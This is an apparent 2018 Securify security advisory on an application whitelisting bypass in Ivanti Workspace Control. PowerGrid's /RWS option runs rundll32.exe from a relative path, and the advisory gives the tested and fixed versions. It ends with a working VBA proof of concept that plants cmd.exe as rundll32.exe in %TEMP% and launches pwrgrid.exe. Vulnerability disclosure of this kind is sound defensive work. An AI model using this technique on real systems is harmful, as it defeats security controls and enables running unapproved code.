------------------------------------------------------------------------ Ivanti Workspace Control Application Whitelist bypass via PowerGrid /RWS command line argument ------------------------------------------------------------------------ Yorick Koster, August 2018 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was found that the PowerGrid application will execute rundll32.exe from a relative path when it is started with the /RWS command line option. An attacker can abuse this issue to bypass Application Whitelisting in order to run arbitrary code on the target machine. ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully verified on Ivanti Workspace Control version 10.2.700.1. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ This issue was resolved in Ivanti Workspace Control version 10.2.950.0. PowerGrid now uses the GetSystemDirectory() function to construct an absolute path to rundll32.exe. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20180801/ivanti-workspace-control-application-whitelist-bypass-via-powergrid-_rws-command-line-argument.html Proof of concept The VBA code below demonstrates this issue. The code tries to run cmd.exe from the %TEMP% folder. Private Sub PowerGridAWLBypass() On Error Resume Next Dim tmpPath, resPath, targetPath tmpPath = Environ("TEMP") resPath = Environ("RESPFDIR") targetPath = Environ("SystemRoot") & "\System32\cmd.exe" FileCopy targetPath, tmpPath & "\rundll32.exe" ChDir tmpPath Dim fso As Object Set fso = CreateObject("Scripting.FileSystemObject") Dim oFile As Object Set oFile = fso.CreateTextFile(tmpPath & "\foo.xml") oFile.WriteLine "" oFile.Close Set fso = Nothing Set oFile = Nothing Shell resPath & "\pwrgrid.exe /RWS foo.xml", vbNormalFocus End Sub